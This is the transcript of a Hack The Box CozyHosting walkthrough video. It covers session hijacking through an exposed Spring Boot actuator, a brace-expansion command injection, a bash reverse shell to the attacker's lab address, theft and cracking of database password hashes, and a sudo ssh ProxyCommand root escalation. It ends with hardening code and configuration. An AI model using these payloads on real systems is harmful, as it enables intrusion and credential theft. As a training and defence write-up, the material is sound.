HackTheBox - CozyHosting
Key Takeaways
The video walks through the CozyHosting machine from Hack The Box: Nmap recon, identifying Spring Boot from its error page, finding an exposed sessions actuator with a framework-specific wordlist, hijacking an authenticated user's JSESSIONID to reach the admin page, command injection in the admin page's SSH-execution feature, pulling Postgres credentials from the extracted application jar, cracking a bcrypt hash to move to the user josh, and escalating to root through a sudo rule on ssh using ProxyCommand.
Full Transcript
What's going on YouTube, this is IppSec. I'm doing CozyHosting from Hack The Box, which starts out with just a web page, and the next step can be pretty tough to find if your recon game isn't good, because you have to identify the framework being used, which is Spring Boot. If you use that, it points you to a Spring Boot wordlist that you can use for dirbusting that has a magic word called actuator in it. An actuator is a debug thing developers can add to Spring Boot applications in order to get some extra information out of it. The sessions actuator lets you query all the sessions on the web page from just a GET request, so we can do that, dump the sessions, do a session hijack, become admin, and that leads to a place where there's a basic RCE vulnerability. We get into the server, then we have to unzip the Java app, look at the properties, get the Postgres credential, which lets us crack a password, and then we get to another user that can do a GTFOBin with SSH through the ProxyCommand functionality. We'll spend a little bit of time explaining what a ProxyCommand is in SSH. So let's just jump in.

As always we're going to start off with an nmap: -sC for default scripts, -sV to enumerate versions, -oA to output all formats, put it in the nmap directory and call it cozyhosting, then the IP address of 10.10.11.230. This can take some time to run, so I've already run it. Looking at the results, we have just two ports open: the first one being SSH on port 22, and its banner tells us it's an Ubuntu server; then we have HTTP on port 80, its banner tells us it's nginx, also running on Ubuntu, and it's redirecting us over to cozyhosting.htb. So let's go ahead and add this to our hosts file: sudo vi /etc/hosts, then we can do 10.10.11.230 and cozyhosting.htb. Let's just go take a look at the website because there's not much else for us. I'm going to go to http://10.10.11.230, and it's going to redirect us over to cozyhosting once I tell Burp Suite not to intercept. Going here, it looks like we have the page, and CozyHosting is some type of web hosting business.

So the first thing I want to do is kind of look at where I can interact with the server, because right now it just looks like a single page. If I click on any of the business plans it redirects me back to the top: Home, Services, Pricing, Login. So Login is really the only place I can interact with it, so let's just try logging in with admin:admin to see if we can get in with default credentials. No luck there. So at this point I want to start a gobuster so I have some type of recon running in the background, so I'm going to do gobuster dir -u cozyhosting.htb with /opt/SecLists/Discovery/Web-Content/raft-small-words.txt. Okay, now that we have that running, it is going to tell us all the pages we have. There is a /admin, but we get an access denied message; /error goes to a 500. But we really want to identify what framework is being used here, so I'm going to send another login request and we're going to examine the response, and right off the bat I see JSESSIONID. Whenever I see JSESSIONID mixed with nginx, I always just test for like dot-dot vulnerabilities, so I'm going to go in the Repeater tab, and since it's doing /login I really doubt there's an nginx rule mapping specifically /login to the Tomcat or Java server, so I really don't think it's going to be some type of off-by-slash thing. But there is kind of a way we can check that. If you look at the headers we see there are 12, and let me change this over to a GET request real quick (Change request method), there we go. It's not going to be valid for this one, but I like doing a GET because eventually I'm going to try to get to like /manager, /administrator, /examples, which are common things in Tomcat, and I'm just thinking Tomcat because I see JSESSIONID, right. So that's why I changed to GET right there, but I see 13 different headers. If I just do a GET on /, let's see how many headers there are: there's 13.

So normally when it passes to a different middleware that may add some type of header, you normally see it like X-Powered-By, but I mean normally nginx just won't send out this X-Content-Type. So we can further test it with like dot-dot, and right here we're seeing nginx is just saying this is a bad request right away. If I add a semicolon here, now we hit the Tomcat server, but because we're at / there's no chance for an off-by-slash vulnerability that would allow us to do directory traversal here, right, because for that off-by-slash thing to happen it needs to have like a location, and then we can say tomcat app. So anything that nginx sees as this it would redirect, but since we're at the parent directory it's this, so there's no way that this location can't end with a slash, and in that example the Tomcat app needed a trailing slash. If you are confused, check out the nginx off-by-slash, but I just wanted to go over my logic why I'm not going too much down that road. We could try like /manager/html, that Tomcat path; we get an error there. If we do it this way we get a bad request, and oddly enough I think, I don't know why this, oh, that's a 400 not a 404, so Tomcat just doesn't know how to handle that. But let's go back to what we saw before with /manager/html: we have this 404 error page, and this string is indicative of Spring Boot. If we Google "Whitelabel Error Page", let's turn Burp Suite off, google.com, here we go: Spring Boot, Spring Boot, Spring Boot, so almost everything is going to be Spring Boot. If we look at our gobuster, we're not really finding anything here; it hasn't really given us any new results since it started. But there are specific wordlists related to Spring Boot, right; I'm just going to grep for spring, there we go. So here we go, let's run this one because it's directed at the framework that's being used, so we do gobuster dir -u cozyhosting.htb with that wordlist, and we see they left the actuators open. The actuators are mainly debug endpoints for Spring Boot applications; they really should not be accessible, but in this case they are.

So if I go to /actuator, we see it giving us information about the environment, right. Let's see the path, let's see what this one looks like. If we go here there's nothing really too sensitive; it does filter out the values by default so we can't access that. Let's check out mappings, let's see what the mappings look like: it's just got a list of all the endpoints, so if we're doing some type of API testing this would be helpful. I actually don't know what executessh is; that must be specific to the application, because we can see htb.cloudhosting executeOverSSH and it's giving the parameters. So we could try sending a POST right here. I've never done that, let's just try sending a POST request right now, POST, and if you're familiar with like other API things this would be like getting Swagger documentation, because it's just telling us a list of all the endpoints. So if we do POST /executessh, we sent it and we still get an error. Let's see, we have to figure out exactly what this URL is. Handler method, does it tell us anything? It's probably under like /admin or something like that. Consume only the method, the pattern, it's not telling us the parameters. Huh, let's see, let's search for login. Oh, there's a parent here, I wonder if executessh is under something else. So nine, let's go up to the top, zero, one, no. This is reading like I should be able to access it, because we see GET /actuator/mappings and then POST /executessh, so I'm not exactly sure what's going on here. I don't think we're supposed to hit this anyways, so it's failing successfully. I just don't understand why we're getting a Whitelabel Error Page; I would expect something slightly different, but oh well, I don't know Spring Boot. But I would look at each of these endpoints: we have /admin, there is /addhost, it's not telling us if that's a GET or a POST, same with /login, so I guess if it doesn't say, it's a GET. So we could also change the request method; /addhost, we also get that error.

So let's just go back to what we had and let's go to /actuator/sessions. If we go to /actuator/sessions we have unauthorized; this is probably going to be our session. Let's look at our Burp: 877, ends in CB; 877, ends in CB. Then we have a session for kanderson. So this actuator is just listing all of the sessions, and we'll get into how you can disable this probably in a little bit, but I do want to try this. Okay, I was putting kanderson's session here hoping it wouldn't give the Whitelabel Error Page, but it still does, so I have no idea what the mapping thing is in this. So right now I went in my developer tools, I'm going to change my JSESSIONID to kanderson's, then we're going to refresh, and I noticed the login disappeared, and if I go to /admin it is no longer denied. I get into the admin page and we can see there's some type of billing thing here, and then there's a connection setting for this Cozy Scanner. So I'm going to give my hostname of 10.10.14.8, I want to do ippsec, and I'm going to listen on port 22. I don't think the servers on Hack The Box can reach back to port 22 though, so if I submit, we can't, and connection timed out. If I do 127.0.0.1 port 22, what happens? Host key verification failed, so the host was not added. Let's go to Burp Suite and intercept this request, so 127.0.0.1, ippsec, send it on over, and let's see, can I change the port? So SSH does allow for ports, so if I do man ssh, lowercase -p. So if I do lowercase -p, let's change it to 8000, and I want to see if I can make the server connect back to me. So we do this, we get a redirect and it's invalid hostname, so I guess they don't want spaces in the hostname. We can try to get rid of spaces by doing, I think it's brace expansion, by putting them in braces and then a comma where we want the space. We still get invalid hostname. So if you are unfamiliar with that technique, let's do echo and then we can say {please,subscribe}, and it's going to just expand what's in here using space as a delimiter and it puts a space. So that's what I'm doing there; it's a tricky way to get spaces. Another way is using the IFS operator, so we can just do ${IFS} like this; I want to say we have to use braces as well, so I don't think this is going to work either. We still see invalid hostname, so we can't do anything there. I was still even going to 127.0.0.1, but invalid hostname, so they have some type of good filter here.

Let's try it over here on the username. So if this is just using bash on the back end, right, it's probably doing ssh user@host. Oh, I was adding like -p here and that's probably what screwed it up, right? It always helps just thinking about what you're doing, right. I was trying for some type of parameter injection, which would mean it's command injectable, and I didn't think about the command. I guess it could have been like -u for user and then like that, right, but most people when they SSH they use the @, right? So of course that's a bad hostname. But what if we put the -p back here, right, that's my next logic. So let's do -p 8000 ippsec, and we see username can't contain whitespaces. So let's do that brace expansion thing again, and we have bad port; never connected to us, and that is odd. Bad port -P. Well, we got an SSH error message, so we know we have something, so we have command injection definitely. I'm not sure why it did that though. Let's do ippsec -p 8000, still bad port, so I'm not sure why we can't change the port here, because we should be able to put the -p flag, but I'm going to kind of ignore that, because when we did something weird, oh well, we have it right now. We have the error message and this is SSH's error message, so we definitely have command injection. I'm going to try a sleep 1, and let's see, I'm going to do a semicolon sleep 1, no, let's do semicolon there and here, and there we go, so now we have command execution, right. When you do this brace expansion you have to keep it on the same thing, so when I was doing this it was treating this as part of the argument. Let's see if it shows it; it doesn't do it here. I wonder if I just needed it on the outside, cuz, nope, we definitely want it on like this. So we have command execution. I wonder what happened if we just did a semicolon; what if we did a comment? It just times out. I think we probably have to URL-encode it. Okay, I was just thinking about like fuzzing, I always like playing with these type of things.

So we have command execution, we want to get a shell, so let's get a reverse shell. I'm going to do vi shell: bash -i >& /dev/tcp/10.10.14.8/9001 0>&1, like that. Okay, base64 -w0 shell, and I'm going to get rid of all the pluses because that's a dangerous character in HTTP that I just hate dealing with; that's probably right here, okay, and we got another plus, that's probably right here, and we can get rid of those equals. It's got two padding, so if I add two spaces, there we go, now it's just pure alphanumeric. So if we copy this we can echo that in, then I'm going to do base64 -d, and then I'm just going to echo it to bash. Let's see, we have it not working. I wonder if I need to put bash like this. We did not get a shell; let's see, oh, it should be on 9001. echo, base64 -d, do we need a -n? Let's try this command on our local box: bash not found. Okay, so you can't put bash in this. There we go, it's hanging, and we get a shell. So that's why I like always making my payloads as simple as possible, because I knew the error wasn't going to be around this, right. I'm going to take a step back and I want to see if I can prove a point real quick. So if I do vi shell, or let's do cp shell to vanillashell, and I'm going to have spaces in my payload, and if we copy this and we paste this in, when we're doing it this way we now have two errors potentially, right: this is going to be an error, and then we don't know exactly how it's treating that plus. So if we had fixed this and didn't think about going back to fix this plus, it's still going to fail, right. Let's go here, whoops, that's definitely going to fail because we pasted it twice, right. This is not working because it's encoding these pluses; if I make that a URL encode, or that's probably HTML encode, then it probably works. No, let's see, listen on 9001, oh, we still have it twice. So 302. I'm going to URL-encode this, still 302; that should have worked, I have no idea what just happened there. We execute vanillashell, that does work; base64 -w vanillashell, we need to say 0. This little proving-a-point thing took a little bit longer than I wanted it to; I thought this would be simpler. Okay, the base64 is bad, it's still not working, right, so if I now URL-encode this it works. So you can work with making your payload like not worrying about this if you just always get in the habit of URL-encoding it, but I really hate when you first paste it that there's two potential error things, and you knew before you even started this command that this could be an issue, because pluses are always bad in web packets. So I just think it's always beneficial to spend the extra couple seconds to make your payload more flexible and get rid of those encodings before they even start, right. So let's listen, there we go.

I'm going to upgrade my shell: python3 -c 'import pty; pty.spawn("/bin/bash")', okay, then stty raw -echo; fg, enter, enter, export TERM=xterm so I can clear the screen, and now I have like tab autocomplete and everything like that. So as the web user of this box, the first thing I want to do is try to get the password of the user; I want to say it's like J Keaton or something, because when we logged in as him we just stole his session and then put that in, so we never got the password or password hash, and normally the web user has the ability to view that type of information. So let's go take a look at where we are, so we have this cloudhosting jar, and normally when you host a Java app it will expand the jar somewhere, so I'm going to do a find / with errors piped to /dev/null, and I'm going to grep for cloudhosting, and that did not work like that, there we go, and the only thing is this one jar file. So we could just start extracting this jar and looking in it, but what we could also do is look at how this is hosted, right, and you could do like systemctl, what is it, I think it's list-units and then --type=service, I think that's the command for this. Let's just Google systemctl list services; I normally don't do it this way because I can't remember all these systemctl commands. Let's see, all services running, it's probably like list-unit-files or something, units, there we go, you can see all the services that are running; one of them's probably going to stick out. Let's see, do we have it, my terminal size is bad. The other way you could list the services that are running would just be find /etc -name '*.service', and that will list all the services here, right. And if we go through, let's see, do we have anything that sticks out: grub, oh, cozyhosting, there it is. I bet that was in the list-units; if I grep for cozy, there we go. But if we just go here, let's go up, we can grab this, and this is going to be how systemd starts this service, right. So we go into the user, group app, and then it's going to just execute java, so it's not using Tomcat or anything at all, so that's why we couldn't access like the manager interface or things like that.

So let's extract this jar. To do that I'm going to copy it over to my box, so I'm going to make source, I guess, and then we can say nc -lvnp 9001, cat cloudhosting to my IP. I did not direct it to a file, to cozyhosting.jar, that would definitely help. There we go, so it's sending me the file and this should finish and give me a prompt back when it's done copying. There we go, and then we can say 7z x to extract cozyhosting.jar, and then we have all the files. So if I go in, let's see, let's do find . -name '*.properties', and there's two: we have the pom and the application. If we look at the application, this is going to be where the actuators are configured, right. We can see management.endpoints.web.exposure.include: health, beans, env, sessions, mappings, so this is all the actuators, and we can see they're enabled, so if you wanted to disable them you change that to false. We see Postgres credentials right here, so the first thing I do is try su - postgres, paste in the password to see if we can get a shell; does not look like we can. We could probably do a psql -U, let's see, is it -U then -h localhost, let's see, peer authentication failed, we probably need a password, is it lowercase -p for this? Let's see, Postgres, or let's do "psql connect": connecting to Postgres using psql, lowercase -h, lowercase -p for the port, -d for database name, -U for database user. So -h localhost, -d, was it -U, I don't know why it didn't ask for the password before, and I copied way too much, copy this, paste, there we go. So now we're on Postgres. Is it \dt to enumerate tables? Let's see, Postgres enumeration, let's do HackTricks. Postgres is a little bit weird how you do enumeration, so this is generally what I do: don't memorize all the commands, memorize how to get to them. So you can do \list or \l to list the databases, so you have cozyhosting, postgres, template1, template0. So we want to use cozyhosting and then, let's see, \d is going to list the tables. I'm going to exit, I'm going to specify the database cozyhosting, copy, paste, there we go. It's probably not use; let's do \d, there we go, we have hosts, hosts_id_seq, and users. So if I did select * from users we can see two: we have kanderson and admin. So let's grab these hashes, so I'm going to grab this and we can vi hashes, and we can go kanderson like that, then admin like this, and now we want to go over to the Kraken to crack them, so copying them, then we can ssh over to Kraken.

Go inside of hashcat, drop the hashes here, I'm going to call this cozyhosting, paste, and now we can crack. So I'm going to do hashcat --username, I think it's username for the flag; it's username, because whenever I use hashcat I like putting username:hash, that way when it cracks it stores the username it went to, it just makes life easy. hashes/cozyhosting and /opt/wordlist/rockyou.txt, and it is going along and we need to specify the hash, so I'm going to guess this is just a bcrypt hash. Let's look at it real quick, hashes/cozyhosting, it starts with $2, yeah, that is probably going to be bcrypt, so -m 3200, there we go. And if this doesn't work I'd always try a different hash as well, and if there was a like register user endpoint I would register a user, because that way I know my password; hash it, put it in the database, and then attempt to crack it, to make sure my mode is correct, right, because the application itself could always be doing something weird, like putting a hash beforehand, like salting it in a non-standard way, which would then break cracking until you realize what it's doing. So we have one hash: manchesterunited. We don't know the username though; we could just look at the hash file and get it that way, or I can just do a --show and we see it goes to admin, right, that's why I like always doing the username, because it helps that way. So let's go back to our box; I just do Ctrl-D to exit, I think \q would as well. Let's cat /etc/passwd, grep for everything that ends in sh because those are going to be the shells, and I'm going to guess admin is going to be josh. So I'm going to do su josh, and I always like doing su - like that and then put his password in. That was the hash, that was not it. Let's grab it, there we go, su josh, paste it in, and we get access as josh. If we do ls -la we can see user.txt.

We can try a sudo -l and see we can run ssh as root, so let's go over to GTFOBins and see if there are any known privescs there, right. If I go to ssh we see a sudo rule, and through sudo we can use ProxyCommand to get a shell. So let's try this: let's do sudo and then I'm going to say /usr/bin/ssh and then id, and we get root. That may look weird: why does the ProxyCommand work that way? The ProxyCommand itself is able to run a command before it runs SSH, and you may be asking why would I ever want to run a command before I SSH into something, right, and the answer to that is whenever you have boxes that you have to establish an SSH tunnel to in order to access, right. So let's say our client is over here, this is our client, and we want to SSH to web, which is over here; however there's some type of firewall in play that is preventing us from just going straight here. This blocks the connection, so we can't just SSH directly to web. However, there is a bastion host that we can SSH to, because this guy has better security policies around it and it's just being monitored, right. So we could SSH down here, let's get rid of that, and then from there we can establish an SSH tunnel, so we could say like -L, let's listen on port 9022, and then any connection there goes through the bastion and ends up on web port 22, and then we SSH here, right, works. The annoying thing is whenever we type ssh web but don't have this tunnel up, it's going to fail, and that's just a huge annoyance. So what the ProxyCommand allows us to do is say when we type ssh web, type this command over here first and make sure that gets established, because then we can just go to web and we don't have to worry about the bastion, because it's automatically going to run that beforehand, and it just makes life really easy. And if you don't see that making your life easy, I'm guessing you're thinking that most people when they use ProxyCommand always type -o ProxyCommand=, and no, most people when they use ProxyCommand, they'll put it in like an SSH config, right. So if I go in ~/.ssh/config, we can see this is the SSH config file, and let's say the box Kraken I couldn't reach directly; let's say I needed to go through a different box called bastion in order to access it. I would just simply put a ProxyCommand here, so I could do ProxyCommand, I'm going to do camel case like that, and then I want to say the syntax would be like ssh -W %h:%p for host and port, and then it would be bastion, right. So whenever I ran the command ssh kraken, beforehand it would set up the tunnel with ProxyCommand to bastion to get it set up, right. So that is how most people use ProxyCommand. So hopefully you guys enjoyed that, and that's going to conclude the video, so with that being said, take care and I'll see you all next time.
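The video's root cause is an application.properties that exposes the sessions actuator to anyone who can reach nginx. The fragment below is an added illustration, not the application's real file (the video only shows that an include list and enabled flags were present); the weak section reproduces what the video describes and the hardened section is the fix a reviewer would ask for. Keys are standard Spring Boot management properties; the loopback port number is an arbitrary choice.

```properties
# --- Weak: what the video describes finding in the extracted jar ---
# Every listed actuator is served on the application port, so nginx proxies
# /actuator/sessions (and /env, /mappings, ...) straight to the internet with
# no authentication in front of it.
management.endpoints.web.exposure.include=health,beans,env,sessions,mappings
management.endpoint.sessions.enabled=true

# --- Hardened: use this block instead of the one above ---
# Nothing is enabled unless named, only health is exposed over HTTP, and the
# management interface moves to a loopback-only port that nginx never proxies.
management.endpoints.enabled-by-default=false
management.endpoint.health.enabled=true
management.endpoints.web.exposure.include=health
management.server.port=8081
management.server.address=127.0.0.1
```

Two caveats: the two sections are alternatives, not a single file (a duplicate key in one properties file silently takes the last value), and on Spring Boot 3.4 and later `enabled-by-default` and `endpoint.<id>.enabled` are deprecated in favour of `management.endpoints.access.default=none` and `management.endpoint.<id>.access=read-only`. After redeploying, the check is the same one the video used to find the hole: a request to /actuator/sessions through nginx should no longer return a session list.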
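The ExecSSH injection works because the application checks for a literal space and then hands a concatenated string to a shell, and the shell performs brace expansion and `${IFS}` substitution only after that check has passed. The following is an added example, not the CozyHosting source (which the video never shows): `build_ssh_command_vulnerable` is a hypothetical reconstruction of the observed behaviour, `shell_view` is a deliberately small model of what bash does to the resulting string, and `build_ssh_command_hardened` is the argv-based replacement. The key path `/app/id_rsa`, the function names and the username/hostname rules are assumptions made for illustration.

```python
"""Added example modelling the CozyHosting ExecSSH bug and its fix.
Not the application's code; every name and path here is an assumption."""
from __future__ import annotations

import re
import shlex
import subprocess

SSH_KEY = "/app/id_rsa"  # hypothetical key path used by the runner


class RejectedInput(ValueError):
    """Input failed the application's validation."""


def build_ssh_command_vulnerable(username: str, hostname: str) -> str:
    """Reconstruction of the observed behaviour: refuse a literal space,
    then build a command line that is later executed by a shell."""
    if " " in hostname:
        raise RejectedInput("Invalid hostname")
    if " " in username:
        raise RejectedInput("Username can't contain whitespaces")
    return f"ssh -i {SSH_KEY} {username}@{hostname}"


_BRACE = re.compile(r"\{([^{}]*,[^{}]*)\}")


def shell_view(command_line: str) -> list[list[str]]:
    """Approximate what bash sees: one level of brace expansion
    ({a,b} -> a b), ${IFS} -> space, split on ';', then word-split each
    segment. A model for illustration, not a shell implementation."""
    expanded = _BRACE.sub(lambda m: " ".join(m.group(1).split(",")), command_line)
    expanded = expanded.replace("${IFS}", " ")
    return [shlex.split(seg) for seg in expanded.split(";") if seg.strip()]


# Hardened version: allow-list the inputs and never go through a shell.
_USERNAME = re.compile(r"[a-z_][a-z0-9_-]{0,31}")
_HOSTNAME = re.compile(
    r"(?=.{1,253}$)[a-z0-9]([a-z0-9-]{0,61}[a-z0-9])?"
    r"(\.[a-z0-9]([a-z0-9-]{0,61}[a-z0-9])?)*",
    re.IGNORECASE,
)


def build_ssh_command_hardened(username: str, hostname: str) -> list[str]:
    """Return an argument vector for subprocess.run(..., shell=False).
    The regexes reject ';', '{', '$', '@' and a leading '-', so neither
    shell metacharacters nor extra ssh options (-p, -o ProxyCommand=...)
    can be smuggled in through the user-controlled fields."""
    if not _USERNAME.fullmatch(username):
        raise RejectedInput("Username must match [a-z_][a-z0-9_-]{0,31}")
    if not _HOSTNAME.fullmatch(hostname):
        raise RejectedInput("Hostname must be a plain DNS name or IPv4 address")
    return [
        "ssh", "-i", SSH_KEY,
        "-o", "BatchMode=yes",              # never prompt; fail closed
        "-o", "StrictHostKeyChecking=yes",  # unknown host is an error, not a prompt
        "-l", username,
        hostname,
    ]


def rejects(username: str, hostname: str) -> bool:
    """True if the hardened builder refuses this pair (used by the tests)."""
    try:
        build_ssh_command_hardened(username, hostname)
    except RejectedInput:
        return True
    return False


def execute(argv: list[str], timeout: float = 10.0) -> int:
    """Run the hardened argv without a shell; returns ssh's exit status."""
    return subprocess.run(argv, shell=False, capture_output=True, timeout=timeout).returncode


if __name__ == "__main__":
    # The payload shape from the video: semicolons around a brace-expanded word.
    cmd = build_ssh_command_vulnerable(";{sleep,1};", "127.0.0.1")
    print(cmd)
    print(shell_view(cmd))  # three commands: ssh (fails), sleep 1, @127.0.0.1
    print(build_ssh_command_hardened("josh", "cozyhosting.htb"))
    print(rejects(";{sleep,1};", "127.0.0.1"), rejects("-oProxyCommand=id", "x"))
```

The point of `shell_view` is the ordering: the application's filter runs on `;{sleep,1};`, which contains no space, and only afterwards does bash turn it into `sleep 1` and treat the semicolons as command separators. The hardened builder does not try to enumerate bad characters; it describes the only good ones and passes them as separate argv entries, so there is no shell parse step left to exploit.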
Original Description
00:00 - Introduction
01:00 - Start of nmap
03:10 - Identify JSESSIONID with nginx, but nginx appears to be configured correctly
06:00 - Googling the error message to identify the page uses SpringBoot, using a SpringBoot wordlist to find actuators!
10:30 - Using the Sessions Actuator and seeing a session for kanderson, logging in to get to the admin interface
14:15 - Finding RCE in the ExecSSH Page
23:20 - Shell on CozyHosting, looking at running services
26:00 - Examining the CozyHosting Jar to identify PostGres credentials then dumping the users table and cracking hashes
33:00 - Josh can run SSH with sudo, using proxy command to get root
34:10 - Explaining what ProxyCommand is